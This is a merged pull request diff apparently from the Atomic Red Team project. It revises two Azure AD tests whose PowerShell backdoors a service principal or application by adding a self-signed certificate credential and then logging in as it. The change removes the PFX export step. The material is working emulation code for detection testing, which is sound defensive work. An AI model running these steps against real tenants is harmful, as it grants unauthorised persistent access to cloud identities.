Merge pull request #2451 from cnotin/pr-remove-pfx-export
No need to export the PFX to get the public certificate, so removed it
This commit is contained in:
Bhavin Patel
@@ -22,14 +22,6 @@ atomic_tests:
|
||||
description: Name of the targeted service principal
|
||||
type: string
|
||||
default: SuperSP
|
||||
certificate_password:
|
||||
description: Password of the new certificate
|
||||
type: string
|
||||
default: Passw0rd
|
||||
path_to_cert:
|
||||
description: Path of the new certificate, locally stored
|
||||
type: string
|
||||
default: $env:TEMP
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
@@ -49,21 +41,18 @@ atomic_tests:
|
||||
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
|
||||
|
||||
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
|
||||
$certNotAfter = (Get-Date).AddDays(2)
|
||||
$credNotAfter = (Get-Date).AddDays(1)
|
||||
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
|
||||
Write-Host "Generated certificate ""$thumb"""
|
||||
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
|
||||
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
|
||||
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
|
||||
|
||||
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
|
||||
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
|
||||
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
|
||||
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
|
||||
|
||||
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
|
||||
|
||||
Start-Sleep -s 30
|
||||
$tenant = Get-AzureADTenantDetail
|
||||
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
|
||||
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
|
||||
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
|
||||
Write-Host "End of Hijacking"
|
||||
|
||||
@@ -82,7 +71,6 @@ atomic_tests:
|
||||
}
|
||||
}
|
||||
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
|
||||
rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
|
||||
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
@@ -107,14 +95,6 @@ atomic_tests:
|
||||
description: Name of the targeted application
|
||||
type: string
|
||||
default: SuperApp
|
||||
certificate_password:
|
||||
description: Password of the new certificate
|
||||
type: string
|
||||
default: Passw0rd
|
||||
path_to_cert:
|
||||
description: Path of the new certificate, locally stored
|
||||
type: string
|
||||
default: $env:TEMP
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
@@ -134,21 +114,18 @@ atomic_tests:
|
||||
if ($app -eq $null) { Write-Warning "Application not found"; exit }
|
||||
|
||||
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
|
||||
$certNotAfter = (Get-Date).AddDays(2)
|
||||
$credNotAfter = (Get-Date).AddDays(1)
|
||||
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
|
||||
Write-Host "Generated certificate ""$thumb"""
|
||||
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
|
||||
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
|
||||
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
|
||||
|
||||
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
|
||||
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
|
||||
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
|
||||
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
|
||||
|
||||
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
|
||||
|
||||
Start-Sleep -s 30
|
||||
$tenant = Get-AzureADTenantDetail
|
||||
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
|
||||
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
|
||||
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
|
||||
Write-Host "End of Hijacking"
|
||||
cleanup_command: |
|
||||
@@ -166,7 +143,6 @@ atomic_tests:
|
||||
}
|
||||
}
|
||||
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
|
||||
rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
- name: AWS - Create Access Key and Secret Key
|
||||
|
||||
Reference in New Issue
Block a user